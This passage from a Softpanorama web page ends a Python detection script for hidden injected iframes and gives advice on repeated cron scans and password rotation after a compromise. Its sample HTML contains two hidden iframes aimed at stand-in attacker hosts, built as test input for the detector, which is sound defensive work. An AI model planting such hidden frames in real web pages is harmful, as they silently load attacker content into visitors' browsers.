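# Constructed sample: one legitimate frame, two injected ones.
SAMPLE_PAGE = """<html><body>
<h1>Company travel policy</h1>
<iframe src="https://static.example-site.test/widget.html" width="400" height="300"></iframe>
<iframe src="http://203.0.113.45/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="http://injected.invalid/" style="position:absolute; left:-5000px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_PAGE):
        print(f"{src}\t{','.join(why)}")
```

A frame that is both external and hidden is the strong signal; a frame with only one reason (a visible third-party embed, or a hidden local frame) is worth a look but is often legitimate. Because the injector described by Hidalgo runs continuously against stolen administrator credentials, run `scan_web_root` from cron and treat a finding that reappears after clean-up as confirmation that the account password, not just the page, has to change.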


FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available in our efforts to advance understanding of environmental, political, human rights, economic, democracy, scientific, and social justice issues, etc. We believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit exclusively for research and educational purposes. If you wish to use copyrighted material from this site for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner.

ABUSE: IPs or network segments from which we detect a stream of probes might be blocked for no less than 90 days. Multiple types of probes increase this period.


The Last but not Least


Copyright © 1996-2015 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License.

The site uses AdSense, so you need to be aware of Google's privacy policy. If you do not want to be tracked by Google, please disable Javascript for this site. This site is perfectly usable without Javascript.

Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.


This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contains some broken links as it develops like a living tree...

You can use PayPal to make a contribution, supporting development of this site and speed up access. In case softpanorama.org is down currently there are two functional mirrors: softpanorama.info (the fastest) and softpanorama.net.

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author's present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.

Last modified: June 04, 2016